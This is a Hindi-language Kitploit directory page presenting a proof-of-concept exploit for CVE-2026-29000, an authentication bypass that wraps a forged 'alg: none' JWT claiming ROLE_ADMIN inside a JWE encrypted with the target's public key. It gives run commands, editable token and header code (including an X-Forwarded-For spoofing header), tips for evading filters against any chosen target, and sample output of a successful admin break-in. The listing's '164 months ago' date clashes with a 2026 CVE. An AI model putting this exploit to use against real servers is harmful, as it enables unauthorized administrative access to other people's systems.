Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-29000 — CVE-2026-29000 का PoC | Kitploit
उपकरण/GitHubGitHub/zf-tm/cve-2026-29000
प्रमाणीकरण और प्राधिकरणएन्क्रिप्शन/डिक्रिप्शन उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubzf-tm/cve-2026-29000

CVE-2026-29000

CVE-2026-29000 का PoC

रिपॉजिटरी देखें
164 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

JWT/JWE प्रमाणीकरण बायपास PoC

यह एक Proof-of-Concept (PoC) स्क्रिप्ट है जो JSON Web Tokens (JWT) और JSON Web Encryption (JWE) का उपयोग करके एक प्रमाणीकरण बायपास कमजोरी को प्रदर्शित करती है। यह टूल उन वातावरणों का शोषण करता है जो टोकन एल्गोरिदम का अनुचित रूप से सत्यापन करते हैं, बिना सत्यापित किए गए JWTs (alg: none) को एक मान्य JWE संरचना के अंदर स्वीकार करके।

यह कैसे काम करता है

यह शोषण श्रृंखला एक सामान्य क्रिप्टोग्राफिक कार्यान्वयन दोष का लाभ उठाती है:

  1. कुंजी निष्कर्षण: यह स्क्रिप्ट लक्ष्य के सार्वजनिक रूप से उजागर jwks (JSON Web Key Set) एंडपॉइंट तक पहुँचती है और सर्वर की सार्वजनिक RSA कुंजी डाउनलोड करती है।
  2. टोकन जालसाजी: यह ROLE_ADMIN विशेषाधिकार प्रदान करने वाला एक नकली, अप्रमाणित JWT पेलोड तैयार करता है। यह जानबूझकर एल्गोरिदम हेडर को "alg": "none" पर सेट करता है।
  3. JWE रैपिंग: सादा टेक्स्ट या अप्रमाणित टोकन को अस्वीकार करने वाले प्रारंभिक सुरक्षा फ़िल्टर को बायपास करने के लिए, यह नकली JWT को सर्वर की अपनी सार्वजनिक कुंजी का उपयोग करके एन्क्रिप्ट करता है, और इसे एक मान्य JWE में पैक करता है।
  4. प्रमाणीकरण: जाली JWE को Authorization: Bearer हेडर के माध्यम से लक्ष्य के संरक्षित डैशबोर्ड पर भेजा जाता है। यदि सर्वर JWE को डिक्रिप्ट करता है और उसके हस्ताक्षर को सत्यापित किए बिना आंतरिक JWT पर आँख बंद करके भरोसा करता है, तो पहुंच प्रदान की जाती है।

पूर्वापेक्षाएँ

स्क्रिप्ट चलाने से पहले, सुनिश्चित करें कि आपके पास Python 3 स्थापित है और आवश्यक निर्भरताएँ भी मौजूद हैं।

root@kitploit:~
pip install requests jwcrypto

उपयोग

स्क्रिप्ट को दो तर्कों की आवश्यकता होती है: वह लक्षित डैशबोर्ड URL जिसे आप परीक्षण करना चाहते हैं, और वह URL जहाँ सार्वजनिक कुंजियाँ होस्ट की जाती हैं।

root@kitploit:~
python3 exploit.py <TARGET_URL_OF_PROTECTED_ENDPOINT> <JWKS_ENDPOINT_URL>

एक्सप्लॉयट को अनुकूलित करना

आपके लक्ष्य के आधार पर, आपको विशिष्ट फ़िल्टर को बायपास करने के लिए टोकन संरचना या HTTP अनुरोधों में बदलाव करने की आवश्यकता हो सकती है।

  1. आंतरिक JWT हेडर और पेलोड को अनुकूलित करना

यदि लक्ष्य सर्वर JWT के अंदर विशिष्ट फ़ील्ड की अपेक्षा करता है (जैसे typ हेडर, या पेलोड में कस्टम उपयोगकर्ता आईडी), तो आप उन्हें आसानी से जोड़ सकते हैं।

exploit.py खोलें और इस अनुभाग का पता लगाएं:

root@kitploit:~
token_header_information = {
    "alg": "none"
}
root@kitploit:~
token_user_information = {
    "sub": "admin",
    "role": "ROLE_ADMIN",
    "iss": "principal-platform",
    "iat": current_time_in_seconds,
    "exp": expiration_time_in_seconds
}

आप अपनी इच्छानुसार कोई भी फ़ील्ड अल्पविराम से अलग करके जोड़ सकते हैं। उदाहरण के लिए, JWT हेडर में typ (टाइप) और kid (कुंजी आईडी) जोड़ने के लिए, और पेलोड में एक कस्टम ईमेल जोड़ने के लिए:

root@kitploit:~
token_header_information = {
    "alg": "none",
    "typ": "JWT",
    "kid": "my-custom-key-id"
}
root@kitploit:~
token_user_information = {
    "sub": "admin",
    "email": "[email protected]",
    "role": "ROLE_ADMIN",
    "iss": "principal-platform",
    "iat": current_time_in_seconds,
    "exp": expiration_time_in_seconds
}
  1. HTTP हेडर को अनुकूलित करना

यदि आपके लक्ष्य को विशिष्ट नेटवर्क हेडर की आवश्यकता है (जैसे कस्टम User-Agent, X-Forwarded-For जैसे बायपास हेडर, या API कुंजियाँ), तो स्क्रिप्ट के निचले भाग में नेटवर्क अनुरोध का पता लगाएं:

root@kitploit:~
custom_authorization_header = {
    "Authorization": "Bearer " + final_forged_token
}

अपने अतिरिक्त नेटवर्क हेडर इस प्रकार जोड़ें:

root@kitploit:~
custom_authorization_header = {
    "Authorization": "Bearer " + final_forged_token,
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "X-Forwarded-For": "127.0.0.1",
    "Accept": "application/json"
}

नोट: यदि आपको ये हेडर प्रारंभिक सार्वजनिक कुंजी डाउनलोड के दौरान भी भेजने की आवश्यकता है, तो आप इसी डिक्शनरी को स्क्रिप्ट के शीर्ष पर requests.get() कॉल में पास कर सकते हैं।

अपेक्षित आउटपुट

सफल होने पर, स्क्रिप्ट जाली टोकन और प्रतिबंधित एंडपॉइंट से प्राप्त पार्स की गई प्रतिक्रिया को आउटपुट करेगी, जो बायपास को सिद्ध करती है:

root@kitploit:~
Starting process...
Connecting to download public keys from: https://target-site.com/api/auth/jwks
Success! Downloaded the key with ID: 12345-abcde
Creating a fake administrator identity card...
Encrypting our fake identity using the server's public key...
Successfully created the encrypted master token!

Here is your forged token:
eyJhbGciOiJSU0EtT0FFUC...

Attempting to break into the dashboard...
Sending our forged token to: https://target-site.com/api/dashboard

SUCCESS! We bypassed the security.
The server thinks we are:
Username: admin
Account Type: ROLE_ADMIN

समस्या निवारण

  • HTTP 401/403 त्रुटियाँ: लक्ष्य सर्वर हस्ताक्षरों को सही ढंग से सत्यापित कर रहा है और alg: none पेलोड को अस्वीकार कर रहा है। एक्सप्लॉयट विफल रहा क्योंकि लक्ष्य सुरक्षित है।
  • कनेक्शन त्रुटियाँ: सुनिश्चित करें कि दिए गए URL में पूर्ण स्कीम (http:// या https://) शामिल है और लक्ष्य सर्वर वर्तमान में पहुंच योग्य है।
  • निर्भरता त्रुटियाँ: सुनिश्चित करें कि jwcrypto pip के माध्यम से सही ढंग से स्थापित है।
टूल डाउनलोड करें